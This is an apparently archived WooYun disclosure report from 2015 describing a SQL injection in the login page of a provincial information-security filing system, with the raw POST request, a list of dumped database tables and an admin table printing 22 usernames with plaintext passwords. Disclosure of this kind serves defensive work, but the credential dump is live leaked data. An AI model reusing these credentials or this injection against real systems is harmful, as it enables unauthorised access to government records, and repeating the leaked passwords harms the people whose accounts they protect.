当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136600

漏洞标题:某省信息安全等级保护备案系统注入sec(政府/学校/公司信息泄露)

相关厂商:某省信息安全等级保护备案系统

漏洞作者: 小天

提交时间:2015-08-24 19:08

修复时间:2015-10-12 14:54

公开时间:2015-10-12 14:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-24: 细节已通知厂商并且等待厂商处理中
2015-08-28: 厂商已经确认,细节仅向厂商公开
2015-09-07: 细节向核心白帽子及相关领域专家公开
2015-09-17: 细节向普通白帽子公开
2015-09-27: 细节向实习白帽子公开
2015-10-12: 细节向公众公开

简要描述:

rt

详细说明:

我能说,,
http://**.**.**.**/bugs/wooyun-2015-0116307
原来的这个漏洞还没修复吗,
这个漏洞是admin登录测试的,,
我回看了一下,,user登录也存在这个漏洞,,
就在主页上,
http://**.**.**.**/
左侧有个登录,

漏洞证明:

直接上code

POST /login.asp HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 76
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/dxal.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDCCRTATSD=PKCLPICBKBNKDIDFJLBDJMGI
username=liuda&password=721226&watercode=alca&imageField.x=33&imageField.y=7


在username和password处,
都存在未过滤,,
上图,,

beian.png


数据库爆出来了

QQ截图20150824173959.png


Database: wjzd
[11 tables]
+-----------+
| ghlyfdb |
| hlyfdb |
| jdjc |
| jfba |
| jfbajdjc |
| jffaaqb |
| jfjgysb |
| jfwsyy |
| userinfo |
| yjp_admin |
| zddwba |
+-----------+
Database: wjzd
Table: yjp_admin
[22 entries]
+----+-------+-------------+----------------+
| id | levle | yjp_admin | yjp_password |
+----+-------+-------------+----------------+
| 15 | 1 | 黑龙江安衡讯 | **.**.**.** |
| 20 | 1 | luxinkai | lxk010558 |
| 22 | 2 | songbei | songbei123 |
| 23 | 3 | daoli | daoli123 |
| 24 | 4 | nangang | nangang123 |
| 25 | 5 | daowai | daowai123 |
| 26 | 6 | xiangfang | xiangfang123 |
| 28 | 8 | hulan | hulan123 |
| 29 | 9 | acheng | acheng123 |
| 30 | 10 | shuangcheng | shuangcheng123 |
| 31 | 11 | wuchang | wuchang123 |
| 32 | 12 | shangzhi | szwadd |
| 33 | 13 | fangzheng | fangzheng123 |
| 34 | 14 | yilan | yilan123 |
| 35 | 15 | binxian | binxian123 |
| 36 | 16 | bayan | bayan123 |
| 37 | 17 | mulan | mulan123 |
| 38 | 18 | tonghe | tonghe123 |
| 39 | 19 | yanshou | yanshou123 |
| 40 | 7 | pingfang | pingfang123 |
| 41 | 1 | panql | 008800 |
| 42 | 1 | liuda | 721226 |
+----+-------+-------------+----------------+
余下的数据参照哦:
http://**.**.**.**/bugs/wooyun-2015-0116307这个吧

修复方案:

参数过滤

版权声明:转载请注明来源 小天@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-08-28 14:54

厂商回复:

感谢提交!!
已通知其修复。

最新状态:

暂无


漏洞评价:

评论